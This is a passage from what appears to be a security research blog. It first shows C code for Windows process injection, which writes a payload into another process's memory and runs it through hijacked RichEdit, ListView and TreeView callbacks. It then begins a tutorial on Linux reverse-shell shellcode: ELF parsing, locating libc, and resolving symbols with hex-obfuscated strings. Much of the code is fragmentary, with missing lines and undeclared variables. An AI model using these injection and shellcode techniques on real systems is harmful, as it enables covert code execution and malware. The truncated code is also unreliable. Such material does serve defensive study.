ptr = VirtualAllocEx(hp, NULL, sizeof(ULONG_PTR),

// 5. Query the interface
SendMessage(rew, EM_GETOLEINTERFACE, 0, (LPARAM)ptr);

// 8. Read virtual function table

// 9. Allocate memory for copy of virtual table
ds = VirtualAllocEx(hp, NULL, sizeof(_IRichEditOle),

reo.GetClipboardData = (ULONG_PTR)cs;

// 11. Write new virtual function table to remote memory
WriteProcessMemory(hp, ds, &reo, sizeof(_IRichEditOle), &wr);

// 12. update IRichEditOle.lpVtbl
WriteProcessMemory(hp, mem, &ds, sizeof(ULONG_PTR), &wr);

// 13. Trigger payload by invoking the GetClipboardData method
PostMessage(rew, WM_COPY, 0, 0);

// 14. Restore original value of IRichEditOle.lpVtbl
WriteProcessMemory(hp, mem, &tbl, sizeof(ULONG_PTR), &wr);

// 15. Free memory and close process handle
VirtualFreeEx(hp, ptr,0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);
}
```

### Listplanting

Sorting items/groups in a ListView control can be customized using the `LVM_SORTGROUPS`, `LVM_INSERTGROUPSORTED` and `LVM_SORTITEMS` messages. The following structure is used for `LVM_INSERTGROUPSORTED`.

```typedef struct tagLVINSERTGROUPSORTED {
PFNLVGROUPCOMPARE pfnGroupCompare;
void              *pvData;
LVGROUP           lvGroup;
} LVINSERTGROUPSORTED, *PLVINSERTGROUPSORTED;
```

The following code uses the registry editor and `LVM_SORTITEMS` to trigger the payload. The problem is that the callback function will be invoked for every item in the list. If no items are in the list, the function isn’t invoked at all. I can think of some ways to work around these issues such as checking how many items are in the list, adding items, removing items, playing around with the parameters passed to the callback function.

```VOID listplanting(LPVOID payload, DWORD payloadSize) {
HANDLE        hp;
DWORD         id;
HWND          lvm;
LPVOID        cs;
SIZE_T        wr;

// 1. get the window handle
lvm = FindWindow(L"RegEdit_RegEdit", NULL);
lvm = FindWindowEx(lvm, 0, L"SysListView32", 0);

// 2. Obtain the process id and try to open process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 3. Allocate RWX memory and copy the payload there.

PostMessage(lvm, LVM_SORTITEMS, 0, (LPARAM)cs);

// 5. Free memory and close process handle
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
CloseHandle(hp);
}
```

### Treepoline

```typedef struct tagTVSORTCB {
HTREEITEM    hParent;
PFNTVCOMPARE lpfnCompare;
LPARAM       lParam;
} TVSORTCB, *LPTVSORTCB;
```

It’s possible to customize sorting via the `TVM_SORTCHILDRENCB` message. For each item, the payload will be executed, so this also requires additional checks to avoid multiple instances running. The first thing we do after obtaininig the TreeListView window handle is get the root item. An item is required before the callback function is invoked.

```// requires elevated privileges
HANDLE        hp;
DWORD         id;
HWND          wpw, tlv;
LPVOID        cs, ds, item;
SIZE_T        rd, wr;
TVSORTCB      tvs;

// 1. get the treeview handle
wpw = FindWindow(L"RegEdit_RegEdit", NULL);
tlv = FindWindowEx(wpw, 0, L"SysTreeView32", 0);

// 2. Obtain the process id and try to open process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);

// 3. Allocate RWX memory and copy the payload there.

// 4. Obtain the root item in tree list
item = (LPVOID)SendMessage(tlv, TVM_GETNEXTITEM, TVGN_ROOT, 0);

tvs.hParent     = item;
tvs.lpfnCompare = cs;
tvs.lParam      = 0;

// 5. Allocate RW memory and copy the TVSORTCB structure
ds = VirtualAllocEx(hp, NULL, sizeof(TVSORTCB),

WriteProcessMemory(hp, ds, &tvs, sizeof(TVSORTCB), &wr);

SendMessage(tlv, TVM_SORTCHILDRENCB, 0, (LPARAM)ds);

// 7. Free memory and close process handle
VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT | MEM_RELEASE);
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);

CloseHandle(hp);
}
```

That’s all!. PoC here.

## Shellcode: A reverse shell for Linux in C with support for TLS/SSL

Shellcode: A reverse shell in C for Linux with support for TLS/SSL

### 1. Introduction

This post will describe how to implement a position-independent code for Linux that can resolve the address of functions in the GNU C Library. The GNU Compiler Collection on an AMD64 build of Debian Linux will be used to compile a source code in C and extract the shellcode from binary. Once you’re familiar with the entire process, writing shellcode for other architectures should be easier. There are many tutorials about writing shellcode for Linux using system calls, but very few, if any at all, using the GNU C Library. The lack of tutorials can be attributed to the fact that process management, file system operations and network connectivity, can be easily implemented on Linux using system calls. In contrast with Linux, the Windows kernel is based on subsystems where the invocation of system calls is not a simple straight forward process. Due to the complexity of system calls on windows, it’s necessary to resolve the address of wrapper functions in Dynamic-link Libraries to do anything useful. This is why tutorials about writing shellcode in C for Windows well outnumber those for Linux.

For additional reading material, I would recommend reading Cheating the ELF – Subversive Dynamic Linking to Libraries by the grugq and the book Linux Binary Analysis by Ryan “elfmaster” O’Neill. There’s a lot of free reading material online that you can find with any good search engine. A PoC can be found here. The following screenshot shows the shellcode connected to the TCP/IP tool ncat that comes bundled with nmap.

### 2. History

The following table ordered in chronological order, highlights some examples of those using C to implement shellcode. There are probably many more than what I’ve listed. Feel free to email me the details of anyone else and I’ll update accordingly.

 August 1999 Sebastian “stealth” Krahmer from Team TESO publishes Hellkit 1.1, a tool that converts C code into shellcode for Linux. July 2003 Inspired by Hellkit, the author of scapy, Philippe Biondi publishes shellforge that uses a combination of C header files and Python to convert a C source code into a shellcode for Linux. September 2003 Dave Aitel from ImmunitySec publishes MOSDEF, a C-like compiler that generates shellcode for Windows and Linux. September 2006 Benjamin Caillat publishes WiShMaster, a tool that generates shellcode for Windows from a C source code. May 2010 Didier Stevens publishes article on writing shellcode for Windows using C. July 2010 Nick Harbour publishes article on writing shellcode for Windows using C. November 2011 Radare publish ragg-cc, a shellcode compiler based on gcc and sflib (shellforge). August 2013 Matt Graeber publishes article on writing shellcode for Windows using C. November 2013 Shellforge G4 published. It’s a fork of shellforge now maintained by Albert Sellarès. May 2014 humeafo publishes a shellcode compiler for windows that uses llvm/clang. December 2015 Binary Ninja publish a shellcode compiler for Windows and Linux. Target architectures include x86, x64, arm, armeb, aarch64, mips, mipsel, ppc, ppcel. May 2016 Jack Ullrich publishes article on writing shellcode for Windows using C. May 2016 Phrack publish issue #69 with article by Justin “fishstiqz” Fisher that describes using gcc-mingw to generate windows shellcode in C. June 2016 Guillaume Delugré publishes Shell-Factory, a tool that uses C++ to generate shellcode for Linux. August 2016 Ixty publishes shellcode generator that derives a cross-platform shellcode for Linux targetting x86, amd64, aarch32 and aarch64. November 2016 Ionut Popescu publishes a shellcode compiler for Windows. Jan 2018 SheLLVM publishes a shellcode compiler for Windows.

### 3. Definitions

A brief description of some abbreviations used in this post are provided to those unfamiliar with what they mean.

### 3.1 Position-independent code (PIC)

When a PIC is executed, it should successfully run regardless of where it resides in memory which is compulsory for any shellcode. Unless a target binary is statically linked, dependencies should always be resolved dynamically.

### 3.2 Position-independent executables (PIE)

Executable binaries made entirely from PIC are mandatory by some systems lacking a Memory Management Unit. However, it’s also used by Address Space Layout Randomization to increase the difficulty of exploiting vulnerabilities. The version of Debian I’m working with has a build of GCC that enables PIE generated binaries by default.

### 3.3 Thread Local Storage / Transport Layer Security (TLS)

TLS is synonymous with the protocol that protects the vast majority of online communications, but it can also refer to a local area of memory containing global variables that are only accessible to a single thread.

### 3.4 Address Space Layout Randomization (ASLR)

ASLR is a technique invented by The PaX Team and published in July 2001. It is intended to mitigate against the exploitation of vulnerabilities by randomizing the memory addresses of a process, including the base of the executable, the stack, the heap and libraries. ASLR is not used for statically linked binaries.

### 3.5 Executable and Link Format

The original specification for the Executable and Link Format (ELF) published in May 1995 by the Linux Foundation. Before attempting to locate the base address of the GNU C Library and any of its exported functions, it’s important to familiarize yourself with the structure of an ELF binary.

### 4. Base of Host Process

There are three ways to obtain the base address of the host process, or two depending on where the shellcode resides in memory. For shellcode running inside an executable segment, simply read the value of the instruction pointer/program counter and then repeatedly subtract the value of `PAGE_SIZE` (usually 4096 bytes) from that (aligned) pointer until a valid ELF header is found. If the shellcode is running from executable memory allocated by the `mmap` function, we can try reading the address from `/proc/self/maps` using system calls or somehow obtain an arbitrary address from the stack or heap. You can also try reading the base address of `libc.so` from the Thread Local Storage (TLS) and obtain the `link_map` structure that contains the base address. I discuss this last approach in section 6.4 when finding the base of `libc.so`

The `get_rip()` function with AMD64 assembly inlined simply loads the current value of the Instruction Pointer (IP) into the RAX register before returning. The `get_base` function will then compare the first 32-bits or 4-bytes of address with what is normally found at the start of an ELF binary. The search continues by subtracting `PAGE_SIZE` or 4096 bytes until it either finds the base address or crashes. There are of course ways to avoid crashing using system calls.

```void* get_rip(void) {
void* ret;

__asm__ __volatile__ (
"lea (%%rip), %%rax\n"
".globl get_rip_label	\n"
"get_rip_label:		    \n"
"mov %%rax, %0" : "=r"(ret));

return ret;
}

// align down
base &= -4096;

// equal to ELF?
while (*(uint32_t*)base != 0x464c457fUL) {
base -= 4096;
}
return (void*)base;
}
```

### 4.2 Process File System

`/proc/self/maps` contains a list of memory addresses, the permissions and the path of module mapped into that memory space. The first address found should belong to the host process. The following code will read the first address, convert the string to binary and return. The system calls are using inline assembly that might look suspicious.

```uint64_t hex2bin(const char hex[]) {
uint64_t r=0;
char     c;
int      i;

for(i=0; i<16; i++) {
c = hex[i];
if(c >= '0' && c <= '9') {
c = c - '0';
} else if(c >= 'a' && c <= 'f') {
c = c - 'a' + 10;
} else if(c >= 'A' && c <= 'F') {
c = c - 'A' + 10;
} else break;
r *= 16;
r += c;
}
return r;
}

void *get_base(void) {
int  maps;
char line[32];
int  str[8];

// /proc/self/maps
str[0] = 0x6f72702f;
str[1] = 0x65732f63;
str[2] = 0x6d2f666c;
str[3] = 0x00737061;
str[4] = 0;

maps = _open((char*)str, O_RDONLY, 0);
if(!maps) return NULL;

_close(maps);

}
```

If the system has patches by Grsecurity installed and `GRKERNSEC_PROC_MEMMAP` is enabled, this code will not work because the option removes addresses from `/proc/[pid]/[smaps|maps|stat]`.

### 5. ELF Layout

Parsing ELF files in memory is required if you want to find the address of functions. I will only discuss what’s necessary to locate the symbol, string and hash tables.

The most important header of all. Every valid ELF executable and shared object should begin with this file header. The binary is interpreted using the following structure.

```typedef struct {
unsigned char e_ident[EI_NIDENT]; /* File identification.              */
Elf64_Half  e_type;               /* File type.                        */
Elf64_Half  e_machine;            /* Machine architecture.             */
Elf64_Word  e_version;            /* ELF format version.               */
Elf64_Addr  e_entry;              /* Entry point.                      */
Elf64_Off   e_phoff;              /* Program header file offset.       */
Elf64_Off   e_shoff;              /* Section header file offset.       */
Elf64_Word  e_flags;              /* Architecture-specific flags.      */
Elf64_Half  e_ehsize;             /* Size of ELF header in bytes.      */
Elf64_Half  e_phentsize;          /* Size of program header entry.     */
Elf64_Half  e_phnum;              /* Number of program header entries. */
Elf64_Half  e_shentsize;          /* Size of section header entry.     */
Elf64_Half  e_shnum;              /* Number of section header entries. */
Elf64_Half  e_shstrndx;           /* Section name strings section.     */
} Elf64_Ehdr;
```

The only fields we need to concern ourselves with for the shellcode are `e_ident`, `e_phoff`, `e_phnum`, `e_shoff` and `e_shnum`. The following shows the header for `/bin/ls` using: readelf -h /bin/ls

```  ELF Header:
Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF64
Data:                              2's complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX - System V
ABI Version:                       0
Type:                              DYN (Shared object file)
Version:                           0x1
Start of program headers:          64 (bytes into file)
Start of section headers:          128816 (bytes into file)
Flags:                             0x0
Size of this header:               64 (bytes)
Size of program headers:           56 (bytes)
Size of section headers:           64 (bytes)
Section header string table index: 29
```

To resolve the address of functions, we only need to work with `PT_DYNAMIC` and `PT_LOAD` types. `PT_LOAD` indicates a loadable program segment such as code (`.text`) or data (`.data`). An ELF binary should always have at least one `PT_LOAD` header, but if `PT_DYNAMIC` is missing, this indicates the binary has been linked statically and requires resolving functions via the section headers read from disk. Of course, you can always use hardcoded addresses.

```typedef struct {
Elf64_Word  p_type;               /* Entry type.                       */
Elf64_Word  p_flags;              /* Access permission flags.          */
Elf64_Off   p_offset;             /* File offset of contents.          */
Elf64_Xword p_filesz;             /* Size of contents in file.         */
Elf64_Xword p_memsz;              /* Size of contents in memory.       */
Elf64_Xword p_align;              /* Alignment in memory and file.     */
} Elf64_Phdr;
```

Example of dumping program headers for `/bin/ls` using: readelf -l /bin/ls

```Program Headers:
FileSiz            MemSiz              Flags  Align
PHDR           0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000001f8 0x00000000000001f8  R E    0x8
INTERP         0x0000000000000238 0x0000000000000238 0x0000000000000238
0x000000000000001c 0x000000000000001c  R      0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
0x000000000001e184 0x000000000001e184  R E    0x200000
0x0000000000001260 0x0000000000002440  RW     0x200000
DYNAMIC        0x000000000001edb8 0x000000000021edb8 0x000000000021edb8
0x00000000000001f0 0x00000000000001f0  RW     0x8
NOTE           0x0000000000000254 0x0000000000000254 0x0000000000000254
0x0000000000000044 0x0000000000000044  R      0x4
GNU_EH_FRAME   0x000000000001ab74 0x000000000001ab74 0x000000000001ab74
0x000000000000082c 0x000000000000082c  R      0x4
GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000  RW     0x10
GNU_RELRO      0x000000000001e388 0x000000000021e388 0x000000000021e388
0x0000000000000c78 0x0000000000000c78  R      0x1
```

The LOAD header with `Offset FileSiz` 0x1e184 is the `.text` segment. We know this because the flags have Read(R) and Execute(E). The other LOAD header has Read(R) and Write(W) flags, and indicates the `.data` segment. The only time you will see all three together (RWE) is in the OMAGIC format or a potentially malicious binary, of course. The following code when provided the base address of an ELF will return the first program header of type, or zero if one can’t be found.

```// return pointer to program header
Elf64_Phdr *elf_get_phdr(void *base, int type) {
int        i;
Elf64_Ehdr *ehdr;
Elf64_Phdr *phdr;

// sanity check on base and type
if(base == NULL || type == PT_NULL) return NULL;

// ensure this some semblance of ELF header
if(*(uint32_t*)base != 0x464c457fUL) return NULL;

// ok get offset to the program headers
ehdr=(Elf64_Ehdr*)base;
phdr=(Elf64_Phdr*)(base + ehdr->e_phoff);

// search through list to find requested type
for(i=0; i<ehdr->e_phnum; i++) {
// if found
if(phdr[i].p_type == type) {
// return pointer to it
return &phdr[i];
}
}
return NULL;
}
```

There are at least two ways to calculate the number of entries in the symbol table. The first is by dividing `Elf64_Shdr.sh_size` for `SHT_SYMTAB` or `SHT_DYNSYM` by `sizeof(Elf64_Sym)` or `DT_SYMENT` from the dynamic section. The other way is using the `nchain` value from `DT_HASH` structure. The problem is that `DT_HASH` is not always available. In its place will be `DT_GNU_HASH` that does not indicate how many entries are in the symbol table. For the shellcode, I use a method that works for both static and dynamically linked binaries, but it requires opening the file on disk and mapping into memory.

```typedef struct {
Elf64_Word      sh_name;       /* index to name of section in string table */
Elf64_Word      sh_type;       /* type of section                          */
Elf64_Xword     sh_flags;      /* section flags                            */
Elf64_Off       sh_offset;     /* file offset for section                  */
Elf64_Xword     sh_size;       /* size of section                          */
Elf64_Word      sh_link;       /* index to associated                      */
Elf64_Word      sh_info;       /* extra info about section                 */
Elf64_Xword     sh_entsize;    /* size of entry if section is a table      */
} Elf64_Shdr;
```

The only fields required here are `sh_type`, `sh_offset`, `sh_size` and `sh_link`. An example of processing the symbol table via section headers is in `get_proc_address3`.

### 5.4 Dynamic Structure

The `.dynamic` section or table contains a list of dynamic entries each of which can be interepreted using the following structure.

```typedef struct {
Elf64_Sxword  d_tag;              /* Entry type.    */
union {
Elf64_Xword d_val;              /* Integer value. */
} d_un;
} Elf64_Dyn;
```

The following `d_tag` values can be used to find specific types. A `d_tag` value of `DT_NULL` indicates where the section/table ends.

 Type Description Value `d_un` `DT_PLTGOT` Pointer to the Procedure Linkage Table / Global Offset Table `3` `d_ptr` `DT_HASH` ELF hash used to locate symbol. `4` `d_ptr` `DT_GNU_HASH` GNU style hash used to locate symbol. `0x6ffffef5` `d_ptr` `DT_STRTAB` Pointer to the string table. `5` `d_ptr` `DT_SYMTAB` Pointer to the symbol table `6` `d_ptr` `DT_SYMENT` The size of a symbol entry `11` `d_val` `DT_SONAME` Index in string table to the Shared Object name `14` `d_val` `DT_DEBUG` Pointer to an `r_debug` structure containing the `link_map` `21` `d_ptr`
```Dynamic section at offset 0x1edb8 contains 27 entries:
Tag        Type                         Name/Value
0x0000000000000001 (NEEDED)             Shared library: [libselinux.so.1]
0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
0x000000000000000c (INIT)               0x34c8
0x000000000000000d (FINI)               0x15c4c
0x0000000000000019 (INIT_ARRAY)         0x21e388
0x000000000000001b (INIT_ARRAYSZ)       8 (bytes)
0x000000000000001a (FINI_ARRAY)         0x21e390
0x000000000000001c (FINI_ARRAYSZ)       8 (bytes)
0x000000006ffffef5 (GNU_HASH)           0x298
0x0000000000000005 (STRTAB)             0x1010
0x0000000000000006 (SYMTAB)             0x350
0x000000000000000a (STRSZ)              1501 (bytes)
0x000000000000000b (SYMENT)             24 (bytes)
0x0000000000000015 (DEBUG)              0x0
0x0000000000000003 (PLTGOT)             0x21f000
0x0000000000000002 (PLTRELSZ)           2544 (bytes)
0x0000000000000014 (PLTREL)             RELA
0x0000000000000007 (RELA)               0x1770
0x0000000000000008 (RELASZ)             4968 (bytes)
0x0000000000000009 (RELAENT)            24 (bytes)
0x000000006ffffffb (FLAGS_1)            Flags: PIE
0x000000006ffffffe (VERNEED)            0x1700
0x000000006fffffff (VERNEEDNUM)         1
0x000000006ffffff0 (VERSYM)             0x15ee
0x000000006ffffff9 (RELACOUNT)          192
0x0000000000000000 (NULL)               0x0
```

Take a look at the following `.dynamic` section for `libc.so` and notice the type of SONAME which is “shared object name”. To read this, add `Elf64_Dyn.d_un.d_val` for `DT_SONAME` to the `Elf64_Dyn.d_un.d_ptr` for `DT_STRTAB` and it will give you a pointer to the string “libc.so.6”

```Dynamic section at offset 0x198ba0 contains 26 entries:
Tag        Type                         Name/Value
0x0000000000000001 (NEEDED)             Shared library: [ld-linux-x86-64.so.2]
0x000000000000000e (SONAME)             Library soname: [libc.so.6]
.....
```

The following code is used to locate a dynamic type.

```uint64_t elf_get_delta(void *base) {
Elf64_Phdr *phdr;
uint64_t   low;

// first should be executable

if(phdr != NULL) {
}
return (uint64_t)base - low;
}

// return pointer to first dynamic type found
Elf64_Dyn *elf_get_dyn(void *base, int tag) {
Elf64_Phdr *dynamic;
Elf64_Dyn  *entry;

// 1. obtain pointer to DYNAMIC program header
dynamic = elf_get_phdr(base, PT_DYNAMIC);

if(dynamic != NULL) {
// 2. obtain pointer to type
while(entry->d_tag != DT_NULL) {
if(entry->d_tag == tag) {
return entry;
}
entry++;
}
}
return NULL;
}
```

### 5.5 Symbol Structure

If a binary is being read from disk, the section headers can be used to calculate the location of the symbol table and how many entries it has. The symbol and table entries can be identified by checking the `sh_type` field of each section header for `SHT_SYMTAB` or `SHT_DYNSYM`. You may be asking yourself, what’s the difference?. Typically, object files will contain a `.symtab` section for the linker, but no `.dynsym` section. ELF binaries that are dynamically linked will contain a `.dynsym` section, but no `.symtab` section. However, if the application is statically linked, the binary will only contain a `.symtab` section. In practice, you should check for both simultaneously in the event that only one exists.

If a binary is being read from memory that was already mapped by the ELF dynamic linker/loader, the section headers won’t be available and there’s only the dynamic program header (`PT_DYNAMIC`) to work with. `DT_STRTAB`, `DT_SYMTAB`, `DT_HASH` or `DT_GNU_HASH` are required for locating the address of functions using the `.dynamic` section. `get_proc_address` demonstrates how to lookup by ELF or GNU hash.

```typedef struct {
Elf64_Word    st_name;            /* String table index of name.   */
unsigned char st_info;            /* Type and binding information. */
unsigned char st_other;           /* Reserved (not used).          */
Elf64_Half    st_shndx;           /* Section index of symbol.      */
Elf64_Addr    st_value;           /* Symbol value.                 */
Elf64_Xword   st_size;            /* Size of associated object.    */
} Elf64_Sym;
```
```Symbol table '.dynsym' contains 136 entries:
Num:    Value          Size Type    Bind   Vis      Ndx Name
0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __snprintf_chk@GLIBC_2.3.4 (4)
6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)
```

### 6. Base of C Library

Although I describe obtaining the base address of the host process in section 4, it’s only necessary to obtain the base address of `libc.so`. We will now examine a number of ways to do this.

### 6.1 Process Maps File (procfs)

A popular method is by parsing `/proc/[pid]/maps` where [pid] is the target process id. Using “self” in place of [pid] will query the current process space.

```int read_line(int fd, char *buf, int buflen) {
int  len;

if(buflen==0) return 0;

for(len=0; len < (buflen - 1); len++) {
// read a byte. exit on error
// exit loop when new line found
if(buf[len] == '\n') {
buf[len] = 0;
break;
}
}
return len;
}

int is_exec(char line[]) {
char *s = line;

// find the first space
// but ensure we don't skip newline or null terminator
while(*s && *s != '\n' && *s != ' ') s++;

// space?
if(*s == ' ') {
do {
s++; // skip 1
// execute flag?
if(*s == 'x') return 1;
// until we reach null terminator, newline or space
} while (*s && *s != '\n' && *s != ' ');
}
return 0;
}

void *get_module_handle1(const char *module) {
int  maps;
char line[PATH_MAX];
int  str[8], len;

// /proc/self/maps
str[0] = 0x6f72702f;
str[1] = 0x65732f63;
str[2] = 0x6d2f666c;
str[3] = 0x00737061;
str[4] = 0;

// 1. open /proc/self/maps
maps = _open((char*)str, O_RDONLY, 0);
if(!maps) return NULL;

// 2. until EOF or module found
for(;;) {
if(len == 0) break;
// 4. remove last character
line[len] = 0;
// if permissions disallow execution, skip it
if(!is_exec(line)) {
continue;
}
// 5. first address should be the base of host process
// if no module is requested, return this address
if(module == 0) {
break;
}
// 6. check if module name is in line
if(_strstr(line, module)) {
break;
}
}
_close(maps);
return base;
}
```

### 6.2 Global Offset Table (DT_PLTGOT)

In May 2002, the grugq provided an an example of how to locate the `link_map` structure stored in the GOT that can then be used to resolve the base address of `libc.so`. In 2007, herm1t shows another way in INT 0x80? No, thank you! that finds it using the address of `libc.so` functions rather than the `link_map`. Either way works, but the method shown here is based on the post by the grugq. The following structure defines the `link_map`. Note, the structure defined in link.h is much more detailed, but this is really all that’s required to obtain the base address of shared objects.

```struct link_map {
file and the addresses in memory.  */
char *l_name;		/* Absolute file name object was found in.  */
ElfW(Dyn) *l_ld;		/* Dynamic section of the shared object.  */
};
```

The `link_map` can be found in various ways, but the most popular seems to be via dynamic structures of type `DT_PLTGOT` and `DT_DEBUG`.

GOT Index Description
0 Relative Virtual Address of `.dynamic` program header (`PT_DYNAMIC`)
1 Pointer to `link_map` structure.
2 Pointer to `_dl_runtime_resolve` function in dynamic linker/loader

The following function will retrieve the address of GOT, extract a pointer to the `link_map` structure and search for the requested module based on string. If no module is provided, the first entry in the list (which happens to be host process) is returned. This is similar to how `GetModuleHandle` works on windows. However, it’s worth noting that because of how shared objects on Linux are named, the module name provided to this function doesn’t need to be exact. A partial name is sufficient, but that makes it more prone to return the wrong entry.

```void *get_module_handle2(const char *module) {
Elf64_Phdr      *phdr;
Elf64_Dyn       *got;
uint64_t        *ptrs;

// 1. get the base of host ELF
base = get_base();
// 2. obtain pointer to dynamic program header
phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);

if(phdr != NULL) {
// 3. obtain global offset table
got = elf_get_dyn(base, DT_PLTGOT);
if(got != NULL) {
ptrs = (uint64_t*)got->d_un.d_ptr;
// 4. search through link_map for module
while (map != NULL) {
// 5 if no module provided, return first in the list
if(module == NULL) {
break;
// otherwise, check by name
} else if(_strstr(map->l_name, module)) {
break;
}
}
}
}
}
```

### 6.3 Debug Structure (DT_DEBUG)

The `link_map` is also available via the debug type or `DT_DEBUG`.

```struct r_debug {
int32_t r_version;          /* version, always one */
void (*r_brk)(void);        /* marker function address */
int32_t r_state;            /* zero if the state of r_map is consistent */
};
```

The following code shows how to resolve using `DT_DEBUG`. It’s essentially the same as `get_module_handle2` that uses `DT_PLTGOT`. In fact, it might be possible to use the same function for two separate types if we only use 64-bit pointers assuming `r_version` is aligned by 8 bytes.

```void *get_module_handle3(const char *module) {
Elf64_Phdr      *phdr;
Elf64_Dyn       *dbg;
struct r_debug  *debug;

// 1. get the base of host ELF
base = get_base();
// 2. obtain pointer to dynamic program header
phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);

if(phdr != NULL) {
// 3. obtain global offset table
dbg = elf_get_dyn(base, DT_DEBUG);
if(dbg != NULL) {
debug = (struct r_debug*)dbg->d_un.d_ptr;
// 4. search through link_map for module
while (map != NULL) {
// 5 if no module provided, return first in the list
if(module == NULL) {
break;
// otherwise, check by name
} else if(_strstr(map->l_name, module)) {
break;
}
}
}
}
}
```

### 6.4 Thread Local Storage (TLS)

herm1t writes in Highway to libc that a pointer to TLS memory for glibc can be found in the Thread Control Block (TCB) accessible via the `gs` register on 32-bit systems or the `fs` register on 64-bit systems. If you look at the value of `fs` on a 64-bit system, it appears to be empty. Accessing `fs` will still return information from the TCB, but at least on my 64-bit system, it did not contain an address for TLS as expected. While the approach described by herm1t didn’t work on this system, there are some interesting addresses at negative offsets. Read A Deep dive into (implicit) Thread Local Storage for more detailed information on TLS.

```  fs-8*7  : main_arena                - heap memory
fs-8*10 : _nl_C_LC_CTYPE_class
fs-8*11 : _nl_C_LC_CTYPE_toupper
fs-8*12 : _nl_C_LC_CTYPE_tolower
fs-8*14 : _res
fs-8*15 : _nl_global_locale
```

The following code will use `_nl_C_LC_CTYPE_class` to locate the base address of `libc.so` on my own system, but may not work elsewhere without modification.

```void *get_base2(void) {
uint64_t *fs, base;

// retrieve the address of _nl_C_LC_CTYPE_class
asm ("mov %%fs:0xffffffffffffffb0,%%rax":"=a"(fs));

base = (uint64_t)fs;

// align down
base &= -4096;

// equal to ELF?
while (*(uint32_t*)base != 0x464c457fUL) {
base -= 4096;
}
return (void*)base;
}
```

Another way simply using the pointer to TCB is presented. It uses a brute force approach and works for dynamic and statically linked binaries. Again, this was tested on my system and may require modification. It works by first obtaining a file descriptor to `/dev/random` and if it can successfully write the contents of address we want to read, we check for the ELF file header.

```void *get_base3(void) {
uint64_t base;
int      fd, str[4];

asm ("mov %%fs:0,%%rax" : "=a" (base));

// align down
base &= -4096;

// "/dev/random"
str[0] = 0x7665642f;
str[1] = 0x6e61722f;
str[2] = 0x006d6f64;

fd = _open((char*)str, O_WRONLY, 0);

for(;;) {
if(_write(fd, (char*)base, 4) == 4) {
if (*(uint32_t*)base == 0x464c457fUL) {
break;
}
}
base -= 4096;
}
_close(fd);

return (void*)base;
}
```

### 7. Resolving Address of Functions

At this point we should have the base address of host process and the base address of libc. However, even if you only managed to retrieve the base address of libc, that would be sufficient to do everything else.

### 7.1 ELF Hash Table (DT_HASH)

1. Hashin’ the elves by herm1t
2. ELF: symbol lookup via DT_HASH by FLAPENGUIN

The following code is derived from those two posts.

```uint32_t elf_hash(const uint8_t *name) {
uint32_t h = 0, g;

while (*name) {
h = (h << 4) + *name++;
g = h & 0xf0000000;
if (g)
h ^= g >> 24;
h &= ~g;
}
return h;
}

void *elf_lookup(
const char *name,
uint32_t *hashtab,
Elf64_Sym *sym,
const char *str)
{
uint32_t  idx;
uint32_t  nbuckets = hashtab[0];
uint32_t* buckets  = &hashtab[2];
uint32_t* chains   = &buckets[nbuckets];

for(idx = buckets[elf_hash(name) % nbuckets];
idx != 0;
idx = chains[idx])
{
// does string match for this index?
if(!_strcmp(name, sym[idx].st_name + str))
return (void*)sym[idx].st_value;
}
return NULL;
}
```

### 7.2 GNU Hash Table (DT_GNU_HASH)

In June 2006, support for the `DT_GNU_HASH` table was added and this apparently speeds up searches by 50%. The hash function was posted to comp.lang.c all the way back in 1991 by Dan Bernstein. Deroko from ARTeam discusses it here while FLAPENGUIN discusses it here. The following code is derived from the post by FLAPENGUIN.

```#define ELFCLASS_BITS 64

uint32_t gnu_hash(const uint8_t *name) {
uint32_t h = 5381;

for(; *name; name++) {
h = (h << 5) + h + *name;
}
return h;
}

struct gnu_hash_table {
uint32_t nbuckets;
uint32_t symoffset;
uint32_t bloom_size;
uint32_t bloom_shift;
uint64_t bloom[1];
uint32_t buckets[1];
uint32_t chain[1];
};

void* gnu_lookup(
const char* name,          /* symbol to look up */
const void* hash_tbl,      /* hash table */
const Elf64_Sym* symtab,   /* symbol table */
const char* strtab         /* string table */
) {
struct gnu_hash_table *hashtab = (struct gnu_hash_table*)hash_tbl;
const uint32_t  namehash    = gnu_hash(name);

const uint32_t  nbuckets    = hashtab->nbuckets;
const uint32_t  symoffset   = hashtab->symoffset;
const uint32_t  bloom_size  = hashtab->bloom_size;
const uint32_t  bloom_shift = hashtab->bloom_shift;

const uint64_t* bloom       = (void*)&hashtab->bloom;
